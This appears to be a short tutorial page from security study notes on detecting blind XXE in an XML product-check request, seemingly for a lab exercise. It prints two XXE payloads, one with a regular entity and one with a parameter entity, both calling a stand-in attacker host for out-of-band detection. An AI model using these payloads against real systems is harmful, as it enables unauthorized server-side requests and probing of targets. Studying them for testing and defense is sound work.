Identification

We can normally detect Blind XXE using the same way how we trigger XXE SSRF attack

<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "http://ATTACKER IP"> ]>

This payload makes the server to give a backend HTTP request to the attacker's URL, Meanwhile the attacker can monitor for the resulting DNS lookup and HTTP request and therefore it confirms there is a Blind XXE.

Use the above payload in the check product xml format, modify it to your current Burp collab client's host and receive a HTTP ping back

Sometimes,

XXE attacks using regular entities are blocked, due to some input validation by the application's backend by increasing the security of the XML parser.

In such situations, we might use XML parameter entities instead, XML parameters are XML entities itself which can be referenced elsewhere within the DTD.

The declaration of an XML parameter entity includes the percent character before the entity name

<!ENTITY % myparameterentity "my parameter entity value" >

Parameter entities are referenced using the percent character instead of the usual &

%myparameterentity;

Which means we can detect and exploit Blind XXE using out-of-band network interaction with the following payload !

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://ATTACKER'S IP"> %xxe; ]>

When we try our usual way to exploit this, we get an error stating Entities aren't allowed because of security reasons

So this means, we can't insert an external entity and call it in the productID parameter

This XXE payload creates an XML parameter entity called xxe and then uses the entity within the DTD

PreviousBlind XXE Attacks NextExploitation

Last updated 1 year ago